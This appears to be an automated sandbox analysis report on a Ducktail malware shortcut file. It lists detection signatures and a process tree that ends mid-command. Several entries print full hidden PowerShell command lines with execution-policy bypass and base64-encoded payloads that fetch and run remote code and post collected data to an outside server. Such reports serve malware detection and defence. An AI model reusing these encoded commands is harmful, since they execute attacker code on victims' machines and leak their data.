Edit tour
Windows
Analysis Report
3y37oMIUy6.lnk
Overview
General Information
Detection
Ducktail
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Ducktail
Allows multiple concurrent remote connection
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies security policies related information
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses regedit.exe to modify the Windows registry
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64native
- cmd.exe (PID: 4696 cmdline:
"C:\Window s\system32 \cmd.exe" /v /k "Pow erSHell.Ex e -WINDoWS tyLe hIdDe n -encOdEd ComMANd "U wB0AGEAcgB 0AC0AUAByA G8AYwBlAHM AcwAgAHAAb wB3AGUAcgB zAGgAZQBsA GwAIAAtAFc AaQBuAGQAb wB3AFMAdAB 5AGwAZQAgA GgAaQBkAGQ AZQBuACAAL QBBAHIAZwB 1AG0AZQBuA HQATABpAHM AdAAgACIAL QBXAGkAbgB kAG8AdwBTA HQAeQBsAGU AIABIAGkAZ ABkAGUAbgA iACwAIAAiA C0ATgBvAEw AbwBnAG8AI gAsACAAIgA tAE4AbwBQA HIAbwBmAGk AbABlACIAL AAgACIALQB FAHgAZQBjA HUAdABpAG8 AbgBQAG8Ab ABpAGMAeQA gAEIAeQBwA GEAcwBzACI ALAAgACIAL QBFAG4AYwB vAGQAZQBkA EMAbwBtAG0 AYQBuAGQAI ABTAFEAQgB GAEEARgBnA EEASQBBAEE AbwBBAEYAc wBBAFYAQQB CAEYAQQBGA GcAQQBWAEE AQQB1AEEAR QBVAEEAVAB nAEIAagBBA EUAOABBAFI AQQBCAHAAQ QBFADQAQQB SAHcAQgBkA EEARABvAEE ATwBnAEIAV gBBAEYAUQB BAFIAZwBBA DQAQQBDADQ AQQBSAHcAQ gBsAEEARgB RAEEAVQB3A EIAMABBAEg ASQBBAFMAU QBCAE8AQQB HAGMAQQBLA EEAQQBvAEE ARQBrAEEAV gB3AEIAeQB BAEMAQQBBA EsAQQBCAGI AQQBGAE0AQ QBlAFEAQgB 6AEEASABRA EEAWgBRAEI AdABBAEMAN ABBAFYAQQB CAGwAQQBIA GcAQQBkAEE AQQB1AEEAR QBVAEEAYgB nAEIAagBBA EcAOABBAFo AQQBCAHAAQ QBHADQAQQB aAHcAQgBkA EEARABvAEE ATwBnAEIAV gBBAEYAUQB BAFIAZwBBA DQAQQBDADQ AQQBSAHcAQ gBsAEEASAB RAEEAVQB3A EIAMABBAEg ASQBBAGEAU QBCAHUAQQB HAGMAQQBLA EEAQgBiAEE ARQBNAEEAY gB3AEIAdQB BAEgAWQBBA FoAUQBCAHk AQQBIAFEAQ QBYAFEAQQA 2AEEARABvA EEAUgBnAEI AeQBBAEcAO ABBAGIAUQB CAEMAQQBHA EUAQQBjAHc AQgBsAEEAR ABZAEEATgB BAEIAVABBA EgAUQBBAGM AZwBCAHAAQ QBHADQAQQB aAHcAQQBvA EEAQwBJAEE AWQBRAEIAS QBBAEYASQB BAE0AQQBCA GoAQQBFAGc AQQBUAFEAQ QAyAEEARQB 3AEEAZQBRA EEANQBBAEc AbwBBAFkAZ wBBAHkAQQB FADQAQQBkA GcAQgBpAEE ARgBjAEEAV gBnAEEAdwB BAEcARQBBA FIAdwBBADU AQQBHAHMAQ QBXAGcAQgB UAEEARABVA EEAYQB3AEI AYQBBAEYAT QBBAE8AUQB CAHQAQQBGA GsAQQBhAHc AQgB2AEEAR ABFAEEAVwB nAEIAWQBBA EcAYwBBAFA AUQBBAGkAQ QBDAGsAQQB LAFEAQQBwA EEAQwBrAEE ATABnAEIAR ABBAEUAOAB BAGIAZwBCA DAAQQBHAFU AQQBiAGcAQ gAwAEEAQwB rAEEASwBRA EEAPQAiAA= ="" && exi t MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5388 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - powershell.exe (PID: 5080 cmdline:
PowerSHell .Exe -WIND oWStyLe hI dDen -encO dEdComMANd "UwB0AGEA cgB0AC0AUA ByAG8AYwBl AHMAcwAgAH AAbwB3AGUA cgBzAGgAZQ BsAGwAIAAt AFcAaQBuAG QAbwB3AFMA dAB5AGwAZQ AgAGgAaQBk AGQAZQBuAC AALQBBAHIA ZwB1AG0AZQ BuAHQATABp AHMAdAAgAC IALQBXAGkA bgBkAG8Adw BTAHQAeQBs AGUAIABIAG kAZABkAGUA bgAiACwAIA AiAC0ATgBv AEwAbwBnAG 8AIgAsACAA IgAtAE4Abw BQAHIAbwBm AGkAbABlAC IALAAgACIA LQBFAHgAZQ BjAHUAdABp AG8AbgBQAG 8AbABpAGMA eQAgAEIAeQ BwAGEAcwBz ACIALAAgAC IALQBFAG4A YwBvAGQAZQ BkAEMAbwBt AG0AYQBuAG QAIABTAFEA QgBGAEEARg BnAEEASQBB AEEAbwBBAE YAcwBBAFYA QQBCAEYAQQ BGAGcAQQBW AEEAQQB1AE EARQBVAEEA VABnAEIAag BBAEUAOABB AFIAQQBCAH AAQQBFADQA QQBSAHcAQg BkAEEARABv AEEATwBnAE IAVgBBAEYA UQBBAFIAZw BBADQAQQBD ADQAQQBSAH cAQgBsAEEA RgBRAEEAVQ B3AEIAMABB AEgASQBBAF MAUQBCAE8A QQBHAGMAQQ BLAEEAQQBv AEEARQBrAE EAVgB3AEIA eQBBAEMAQQ BBAEsAQQBC AGIAQQBGAE 0AQQBlAFEA QgB6AEEASA BRAEEAWgBR AEIAdABBAE MANABBAFYA QQBCAGwAQQ BIAGcAQQBk AEEAQQB1AE EARQBVAEEA YgBnAEIAag BBAEcAOABB AFoAQQBCAH AAQQBHADQA QQBaAHcAQg BkAEEARABv AEEATwBnAE IAVgBBAEYA UQBBAFIAZw BBADQAQQBD ADQAQQBSAH cAQgBsAEEA SABRAEEAVQ B3AEIAMABB AEgASQBBAG EAUQBCAHUA QQBHAGMAQQ BLAEEAQgBi AEEARQBNAE EAYgB3AEIA dQBBAEgAWQ BBAFoAUQBC AHkAQQBIAF EAQQBYAFEA QQA2AEEARA BvAEEAUgBn AEIAeQBBAE cAOABBAGIA UQBCAEMAQQ BHAEUAQQBj AHcAQgBsAE EARABZAEEA TgBBAEIAVA BBAEgAUQBB AGMAZwBCAH AAQQBHADQA QQBaAHcAQQ BvAEEAQwBJ AEEAWQBRAE IASQBBAEYA SQBBAE0AQQ BCAGoAQQBF AGcAQQBUAF EAQQAyAEEA RQB3AEEAZQ BRAEEANQBB AEcAbwBBAF kAZwBBAHkA QQBFADQAQQ BkAGcAQgBp AEEARgBjAE EAVgBnAEEA dwBBAEcARQ BBAFIAdwBB ADUAQQBHAH MAQQBXAGcA QgBUAEEARA BVAEEAYQB3 AEIAYQBBAE YATQBBAE8A UQBCAHQAQQ BGAGsAQQBh AHcAQgB2AE EARABFAEEA VwBnAEIAWQ BBAEcAYwBB AFAAUQBBAG kAQQBDAGsA QQBLAFEAQQ BwAEEAQwBr AEEATABnAE IARABBAEUA OABBAGIAZw BCADAAQQBH AFUAQQBiAG cAQgAwAEEA QwBrAEEASw BRAEEAPQAi AA==" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 6616 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden -NoLogo -N oProfile - ExecutionP olicy Bypa ss -Encode dCommand S QBFAFgAIAA oAFsAVABFA FgAVAAuAEU ATgBjAE8AR ABpAE4ARwB dADoAOgBVA FQARgA4AC4 ARwBlAFQAU wB0AHIASQB OAGcAKAAoA EkAVwByACA AKABbAFMAe QBzAHQAZQB tAC4AVABlA HgAdAAuAEU AbgBjAG8AZ ABpAG4AZwB dADoAOgBVA FQARgA4AC4 ARwBlAHQAU wB0AHIAaQB uAGcAKABbA EMAbwBuAHY AZQByAHQAX QA6ADoARgB yAG8AbQBCA GEAcwBlADY ANABTAHQAc gBpAG4AZwA oACIAYQBIA FIAMABjAEg ATQA2AEwAe QA5AGoAYgA yAE4AdgBiA FcAVgAwAGE ARwA5AGsAW gBTADUAawB aAFMAOQBtA FkAawBvADE AWgBYAGcAP QAiACkAKQA pACkALgBDA E8AbgB0AGU AbgB0ACkAK QA= MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6444 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - csc.exe (PID: 8080 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\myainn c2\myainnc 2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 4784 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESBF0C.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\mya innc2\CSC6 AA9D23DB1D 446FF89BA3 B754739F41 D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - powershell.exe (PID: 7852 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Version 5 .1 -s -NoL ogo -NoPro file MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - WINWORD.EXE (PID: 3048 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Root\ Office16\W INWORD.EXE " /n "C:\U sers\user\ AppData\Lo cal\Temp\J D-Meta-Ads -Manager.p df.docx" / o "" MD5: E7F3B8EA1B06F46176FC5C35307727D6) - cmd.exe (PID: 6620 cmdline:
"C:\Window s\system32 \cmd.exe" /c start / min "" pow ershell.ex e -WindowS tyle hidde n -NoLogo -NoProfile -Executio nPolicy by pass -Enco dedCommand JAB1AHIAa QAgAD0AIAA iAGgAdAB0A HAAcwA6AC8 ALwBjAG8AY wBvAG0AZQB 0AGgAbwBkA GUALgBkAGU ALwBmAGkAb ABlADIALwA 1AGEAMAA0A DcAMQBlADc AOQA2ADcAN gBmADYAOQA 2ADAAZgAyA DYAOABhAGQ AZgA0ADMAM QA2ADQAYwB iADgAZgBjA DgANABkAGM AZQA4ADAAM AA3AGEAMgA 0AGEAOABjA DkAYgBjAGY ANgBhAGMAZ gAwADUAYwA yAGYANAAzA GYAMQBlAGU ANQAxADgAM QBmAGMANwA yAGUANQBlA DgAYQAzAGE AZgA1AGQAZ QA4ADQAYQA yAGUAZgBkA GYANAA2ADU ANQA2AGMAZ QA0AGIAMQA 4AGYAOQBhA DkAMAA1ADg AZgAwADIAY gBhAGUAZQB iAGIAYQA0A DcAOQA1ADc AZgBmADkAY QAwADAAZgB kADMAYwBiA GQAZgA1AGE AZgBkAGIAN AA1ADUANAB lAGYAOQA1A GQAMQA1ADY AYgBkAGUAM QA1ADMAYQA 0ADEAMgA4A DMAMwAzAGU AMQAxADgAZ QBhADQANwB kADEAZQA3A DYANQBiAGQ AMAA0ADIAY QBkADQAZgB lADAAYwBlA DcANAAyAGI AMQAxADQAZ ABmADIAMgA yADUAZABlA DUAMgA1ADk AZAAzADkAM gAzADAAIgA 7AA0ACgAkA GMAbwB1AG4 AdAAgAD0AI AAxADAAMAA 7AA0ACgANA AoADQAKAA0 ACgBmAHUAb gBjAHQAaQB vAG4AIABTA GUAbgBkACA AewANAAoAI AAgACAAIAB wAGEAcgBhA G0AKAAgAFs AUABTAE8AY gBqAGUAYwB 0AF0AIAAkA GwAbwBnAE0 AcwBnACAAK QANAAoADQA KACAAIAAgA CAAIwAgAEM AbwBuAHYAZ QByAHQAIAB iAG8AZAB5A CAAdABvACA AcwB0AHIAa QBuAGcADQA KACAAIAAgA CAAJABzAHQ AcgBpAG4AZ wBCAG8AZAB 5ACAAPQAgA FsAcwB0AHI AaQBuAGcAX QAoACQAbAB vAGcATQBzA GcAIAB8ACA AQwBvAG4Ad gBlAHIAdAB UAG8ALQBKA HMAbwBuACk AOwANAAoAI AAgACAAIAA kAGwAbwBnA E0AZQBzAHM AYQBnAGUAc wAgAD0AIAB AACgAKQA7A A0ACgAgACA AIAAgACQAb ABvAGcATQB lAHMAcwBhA GcAZQBzACA AKwA9ACAAJ ABzAHQAcgB pAG4AZwBCA G8AZAB5ADs ADQAKACAAI AAgACAAJAB sAG8AZwBNA GUAcwBzAGE AZwBlAHMAI AArAD0AIAA iAC0ALQAtA C0ALQAtAC0 ALQAtAC0AI gA7AA0ACgA NAAoAIAAgA CAAIAAkAGg AZQBhAGQAZ QByAHMAIAA 9ACAAQAB7A H0AOwANAAo AIAAgACAAI AAkAGsAZQB 5ACAAPQAgA CIAQwBvAG4 AdABlAG4Ad AAtAFQAeQB wAGUAIgA7A A0ACgAgACA AIAAgACQAd gBhAGwAdQB lACAAPQAgA CIAYQBwAHA AbABpAGMAY QB0AGkAbwB uAC8AagBzA G8AbgAiADs ADQAKAA0AC gAgACAAIAA gACQAaABlA GEAZABlAHI AcwBbACQAa wBlAHkAXQA gAD0AIAAkA HYAYQBsAHU AZQA7AA0AC gAgACAAIAA gACQAdQByA GkAIAA9ACA AIgBMAE8AR wBVAFIATAA iADsADQAKA CAAIAAgACA AdAByAHkAD QAKACAAIAA gACAAIAAgA CAAIAB7AA0 ACgAgACAAI AAgACAAIAA gACAAIAAgA CAAIAAkAGI AbwBkAHkAI AA9ACAAJAB sAG8AZwBNA GUAcwBzAGE AZwBlAHMAI AB8ACAAQwB vAG4AdgBlA HIAdABUAG8 ALQBKAHMAb wBuADsADQA KACAAIAAgA CAAIAAgACA AIAAgACAAI AAgAEkAbgB 2AG8AawBlA C0AVwBlAGI AUgBlAHEAd QBlAHMAdAA gAC0AVQByA GkAIAAkAHU AcgBpACAAL QBNAGUAdAB oAG8AZAAgA FAAbwBzAHQ AIAAtAEgAZ QBhAGQAZQB yAHMAIAAkA GgAZQBhAGQ AZQByAHMAI AAtAEIAbwB kAHkAIAAkA GIAbwBkAHk ADQAKACAAI AAgACAAIAA gACAAIAB9A A0ACgAgACA AIAAgACAAI AAgACAAYwB hAHQAYwBoA HsADQAKACA AIAAgACAAI AAgACAAIAA gACAAIAAgA A0ACgAgACA AIAAgACAAI AAgACAAfQA NAAoAIAAgA